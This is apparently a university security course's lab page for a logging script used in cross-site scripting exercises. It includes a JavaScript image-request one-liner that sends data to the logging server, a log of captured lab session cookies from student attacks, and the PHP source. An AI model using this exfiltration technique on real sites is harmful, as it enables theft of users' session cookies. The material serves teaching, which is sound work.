You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.858/2020/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Tue, 16 Dec 2025 03:32:35 +0000: attacker: grader/EZHTJOZGHATQ Tue, 16 Dec 2025 03:32:27 +0000: atacante: grader/GKXSOQICOAMU Tue, 16 Dec 2025 03:32:23 +0000: atacante: grader/DCRTZLZMABHJ Tue, 16 Dec 2025 03:32:14 +0000: attacker: PyZoobarLogin=grader#bdda892bbbb84cc88fad8a3516e2a60b Tue, 16 Dec 2025 03:32:10 +0000: attacker: PyZoobarLogin=grader#a588f48a25fcedcd4ce7afde740b403a Tue, 16 Dec 2025 03:32:02 +0000: atacante: PyZoobarLogin=grader#dd5e2cbc10df9be720849c2e7483f8f0 Tue, 16 Dec 2025 03:30:12 +0000: attacker: grader/OEXMLRFKCNCC Mon, 15 Dec 2025 22:55:47 +0000: attacker: grader/XLQYUPTNORSG Mon, 15 Dec 2025 22:55:37 +0000: atacante: grader/ITZGXSOMTFEC Mon, 15 Dec 2025 22:55:31 +0000: atacante: grader/RYELALBEQMQZ Mon, 15 Dec 2025 22:55:17 +0000: attacker: PyZoobarLogin=grader#2267c3dac07c1c8ec9a29dc519fa7234 Mon, 15 Dec 2025 22:55:11 +0000: attacker: PyZoobarLogin=grader#a3cf83e819ff2ba6c453f2180b8483c8 Mon, 15 Dec 2025 22:55:01 +0000: atacante: PyZoobarLogin=grader#2d2e5021cca318da8baaa3134f98d253 Mon, 15 Dec 2025 22:46:36 +0000: attacker: grader/DCAOCUUBKSFY Mon, 15 Dec 2025 22:46:27 +0000: atacante: grader/JIICZKWGPJZX Mon, 15 Dec 2025 22:46:21 +0000: atacante: grader/ASRDCJPGMIZI Mon, 15 Dec 2025 22:46:08 +0000: attacker: PyZoobarLogin=grader#53318cd2f45c6499bddbe70b0ec44514 Mon, 15 Dec 2025 22:46:02 +0000: attacker: PyZoobarLogin=grader#bebbfdccd8a75f2d90d9007092615c77 Mon, 15 Dec 2025 22:45:52 +0000: atacante: PyZoobarLogin=grader#d66bada11b137a3484ed1f9918bfbb7b Mon, 15 Dec 2025 22:41:36 +0000: attacker: grader/LVBKIUJWCVQV Mon, 15 Dec 2025 22:41:27 +0000: atacante: grader/UEFTXCHWJKZV Mon, 15 Dec 2025 22:41:22 +0000: atacante: grader/UZRDLZYBYUBZ Mon, 15 Dec 2025 22:41:08 +0000: attacker: PyZoobarLogin=grader#6bd048e9a6bb2b3384f60776f3d2a622 Mon, 15 Dec 2025 22:41:03 +0000: attacker: PyZoobarLogin=grader#1e6448dcfc34acb5f8ec1f315d286e33 Mon, 15 Dec 2025 22:40:52 +0000: atacante: PyZoobarLogin=grader#8fb583746061d4e80120de992868ef9f Mon, 15 Dec 2025 22:39:07 +0000: attacker: grader/CZMEKDJKTDTQ Mon, 15 Dec 2025 22:38:58 +0000: atacante: grader/WLYMAHARDTGE Mon, 15 Dec 2025 22:38:53 +0000: atacante: grader/NYFQRFSOJOWO Mon, 15 Dec 2025 22:38:39 +0000: attacker: PyZoobarLogin=grader#5653ed400320ce1d65229fb4ad2e57cc Mon, 15 Dec 2025 22:38:33 +0000: attacker: PyZoobarLogin=grader#86916bc6be654390fe3f013c541c6daf Mon, 15 Dec 2025 22:38:23 +0000: atacante: PyZoobarLogin=grader#74bfb0e594888a48c9d550db7d799fa8 Mon, 15 Dec 2025 22:34:57 +0000: attacker: grader/XZQXPKSFNMRI Mon, 15 Dec 2025 22:33:22 +0000: attacker: grader/PGGKZIWZOVRB Mon, 08 Dec 2025 21:51:23 +0000: gitcross: grader/FJWPFVIYKYZF Mon, 08 Dec 2025 21:51:17 +0000: gitcross: grader/FCWAPQODGCXY Mon, 08 Dec 2025 21:51:04 +0000: gitcross: grader#30ed79835ac8ce8ce24896aa5d0ee312 Mon, 08 Dec 2025 21:50:59 +0000: gitcross: grader#1fe337739cc8e758bb2544351e53af5d Mon, 08 Dec 2025 21:50:50 +0000: gitcross: grader#51ae2d33ddd9abdcb292eb1682f9832d Mon, 08 Dec 2025 20:56:49 +0000: zhonguo: grader#ee5997b1b1153cbfc9c21967ca992225 Mon, 08 Dec 2025 20:56:44 +0000: zhonguo: grader#eb291d54025e3e98c9a9f9be04027b1b Mon, 08 Dec 2025 20:56:35 +0000: zhonguo: grader#77399cf7d3da4ceb8ea08b58b6d472c9 Mon, 08 Dec 2025 20:55:29 +0000: pfudor: PyZoobarLogin=grader#b0a894aded0b6746f3399a75f9f641de Mon, 08 Dec 2025 20:55:24 +0000: pfudor: PyZoobarLogin=grader#8cd4965e642f23b351db8d0095550b05 Mon, 08 Dec 2025 20:55:15 +0000: pfudor: PyZoobarLogin=grader#b502c4182a99888b4a7aaf6309088ec2 Mon, 08 Dec 2025 20:54:42 +0000: HesseKassel: grader/ZNVGNEKJMEVE Mon, 08 Dec 2025 20:54:29 +0000: HesseKassel: grader#d557d7721a3ba010524c203614e6c1f8 Mon, 08 Dec 2025 20:54:24 +0000: HesseKassel: grader#abbc84f74e6ef03e29b5c6f2fa341269 Mon, 08 Dec 2025 20:54:15 +0000: HesseKassel: grader#46c9ae84bc330c8a150f4df5b04e8474 Mon, 08 Dec 2025 20:53:43 +0000: Myst12: grader/JRMBVVCJKCNK Mon, 08 Dec 2025 20:53:39 +0000: Myst11: grader/NVUSFAWOVYAG Mon, 08 Dec 2025 20:53:27 +0000: Myst5: PyZoobarLogin=grader#938c59f4db1bf39caf0a9ca174a806d2 Mon, 08 Dec 2025 20:53:23 +0000: Myst4: PyZoobarLogin=grader#11542c7fdb145a4401623fe7ca91a947 Mon, 08 Dec 2025 20:53:15 +0000: Myst2: PyZoobarLogin=grader#7bbecad1ffe7aed24c925b44dd6777a0 Mon, 08 Dec 2025 20:51:48 +0000: holovich: PyZoobarLogin=grader#70068710f68552a16af98e76b3465e71 Mon, 08 Dec 2025 20:51:43 +0000: holovich: PyZoobarLogin=grader#e8ba39137a3b0df3829d294e0bee1411 Mon, 08 Dec 2025 20:51:33 +0000: holovich: PyZoobarLogin=grader#8c0f31b16b260705f9ee6ef038a76ff1 Mon, 08 Dec 2025 20:49:07 +0000: us: grader#e7e1b207ac2e820f7234fdf4f28a316c Mon, 08 Dec 2025 20:49:01 +0000: us: grader#f1e23e409be0171ea9b90e81125e0727 Mon, 08 Dec 2025 20:48:52 +0000: us: grader#1edb47d31dca2caf7a0e21ad767efe98 Mon, 08 Dec 2025 20:47:52 +0000: friveror: grader/LMUGAIMDMYNJ Mon, 08 Dec 2025 20:47:41 +0000: friveror: grader/HHHEMEELHQBE Mon, 08 Dec 2025 20:47:33 +0000: friveror: grader/FJPYNJODRLDZ Mon, 08 Dec 2025 20:47:18 +0000: friveror: PyZoobarLogin=grader#a961987bd87f02d0eb78d8c6ae5f2902 Mon, 08 Dec 2025 20:47:13 +0000: friveror: PyZoobarLogin=grader#0e389256437b076409cecc7f818aba6e Mon, 08 Dec 2025 20:47:01 +0000: friveror: PyZoobarLogin=grader#f4c4b46c084327d84f14a88bd767d97e Mon, 08 Dec 2025 20:46:11 +0000: test: grader/TZMUOVQSVSQL Mon, 08 Dec 2025 20:46:07 +0000: test: grader/LINKUDBOQVJI Mon, 08 Dec 2025 20:45:54 +0000: test: PyZoobarLogin=grader#e6be43c3e096e35d2873f1dde4920e37 Mon, 08 Dec 2025 20:45:49 +0000: test: PyZoobarLogin=grader#5cef198b07df3a9564e6dd8773457e66 Mon, 08 Dec 2025 20:45:40 +0000: test: PyZoobarLogin=grader#65ef5d2b7d42bc8f80e3eacbb047fe43 Mon, 08 Dec 2025 20:44:59 +0000: Santi: grader/UOHNZGFVBQXJ Mon, 08 Dec 2025 20:44:54 +0000: Santi: grader/WNZUDSVSCIJC Mon, 08 Dec 2025 20:44:39 +0000: Santi: PyZoobarLogin=grader#a14a5027bec24c6a610e4cf14165bf17 Mon, 08 Dec 2025 20:44:33 +0000: Santi: PyZoobarLogin=grader#ac4f50f0c7ab63cf69b5e109e4864bf8 Mon, 08 Dec 2025 20:44:24 +0000: Santi: PyZoobarLogin=grader#665a03574cc9ef4e1efb52fc1e1562f0 Mon, 08 Dec 2025 20:43:35 +0000: attacker: grader/EXDFSWDPAYPC Mon, 08 Dec 2025 20:42:47 +0000: pepepape: PyZoobarLogin=grader#f2fd4c221c68647da04ed5917f5d7184 Mon, 08 Dec 2025 20:42:41 +0000: pepepape: PyZoobarLogin=grader#092aab916bcac929e27a23bd9e6fdf67 Mon, 08 Dec 2025 20:42:33 +0000: pepepape: PyZoobarLogin=grader#9466a185ac310ebb4210383e69b8d0de Mon, 08 Dec 2025 20:41:21 +0000: OLA: PyZoobarLogin=grader#d35095678485528d86c1d68ee2be6df9 Mon, 08 Dec 2025 20:41:16 +0000: xdd: PyZoobarLogin=grader#4257948b7673a5d19f6eb3ad31d75ad8 Mon, 08 Dec 2025 20:41:07 +0000: xd: PyZoobarLogin=grader#985f45154072a69093370961164c8bd5 Mon, 08 Dec 2025 20:40:16 +0000: alesierra: grader/FWHJFAYSCKXY Mon, 08 Dec 2025 20:40:04 +0000: alesierra: grader/UBUOLQXIUYRR Mon, 08 Dec 2025 20:39:57 +0000: alesierra: grader/FGCVSMGYVLRR Mon, 08 Dec 2025 20:39:43 +0000: alesierra: PyZoobarLogin=grader#40d4861234249e4be3e46e9f7e0f39a5 Mon, 08 Dec 2025 20:39:38 +0000: alesierra: PyZoobarLogin=grader#be1e917ad3f9bedf071bfdfc1bc6fd33 Mon, 08 Dec 2025 20:39:28 +0000: alesierra: PyZoobarLogin=grader#6f2c8f73270508c07b55d7e0a4f6b63a Mon, 08 Dec 2025 20:38:54 +0000: tarea: grader/WRSPUQSXBSRG Mon, 08 Dec 2025 20:38:48 +0000: tarea: grader/QCTXTVACHRSI Mon, 08 Dec 2025 20:38:35 +0000: tarea: PyZoobarLogin=grader#b639899296b6d69ba74a6301f5359f11 Mon, 08 Dec 2025 20:38:29 +0000: tarea: PyZoobarLogin=grader#f6cfaa0ceebc4f845a2115855d93dbf2 Mon, 08 Dec 2025 20:38:19 +0000: tarea: PyZoobarLogin=grader#b4094b20a53b338609ee143cd6ba4eec Mon, 08 Dec 2025 20:37:31 +0000: Hatsune_Miku: grader#8210e413a7ea29d0fc86deaebbceb5f7 Mon, 08 Dec 2025 20:37:22 +0000: Megurine_Luka: grader#be992c6b7223a2186e5db4adb7cea68c Mon, 08 Dec 2025 20:35:44 +0000: Gustave: grader/FIRBSTKWPSSI Mon, 08 Dec 2025 20:35:32 +0000: ForThoseWhoComeAfter: PyZoobarLogin=grader#9ded613a6a849243e0f88476e175e7af Mon, 08 Dec 2025 20:35:27 +0000: ForThoseWhoComeAfter: PyZoobarLogin=grader#f4cd02eb0d3d8f43cf3df1d5dd551d4f Mon, 08 Dec 2025 20:35:19 +0000: ForThoseWhoComeAfter: PyZoobarLogin=grader#0eb50d1f8ae2db2c2b232eae043c1780 Mon, 08 Dec 2025 20:34:31 +0000: shoesuke: grader/USLFZCMVQERQ Mon, 08 Dec 2025 20:34:18 +0000: shoesuke: grader/OYFTAJEGUKAO
In case you are curious, here is the source code of this page.
<?php do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.858-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.858/2020/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.858-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>